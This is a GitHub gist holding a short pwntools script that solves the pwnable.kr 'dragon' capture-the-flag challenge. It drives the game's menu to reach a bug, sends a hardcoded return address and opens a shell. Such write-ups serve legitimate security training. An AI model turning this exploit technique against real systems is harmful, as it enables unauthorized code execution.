Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Select an option

  • Save spnow/37df2e545879048858c6736445af71c2 to your computer and use it in GitHub Desktop.

Select an option

Save spnow/37df2e545879048858c6736445af71c2 to your computer and use it in GitHub Desktop.
pwnable.kr dragon writeup
from pwn import *
sh = remote('pwnable.kr', 9004)
sh.recv(10000)
sh.sendline('2')
sh.recv(10000)
for _ in range(3):
        sh.sendline('1')
        sh.recv(10000)
for _ in range(4):
        sh.sendline('3')
        sh.recv(10000)
        sh.sendline('3')
        sh.recv(10000)
        sh.sendline('2')
        sh.recv(10000)
sh.sendline('\xbf\x8d\x04\x08')
sh.recv(10000)
sh.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment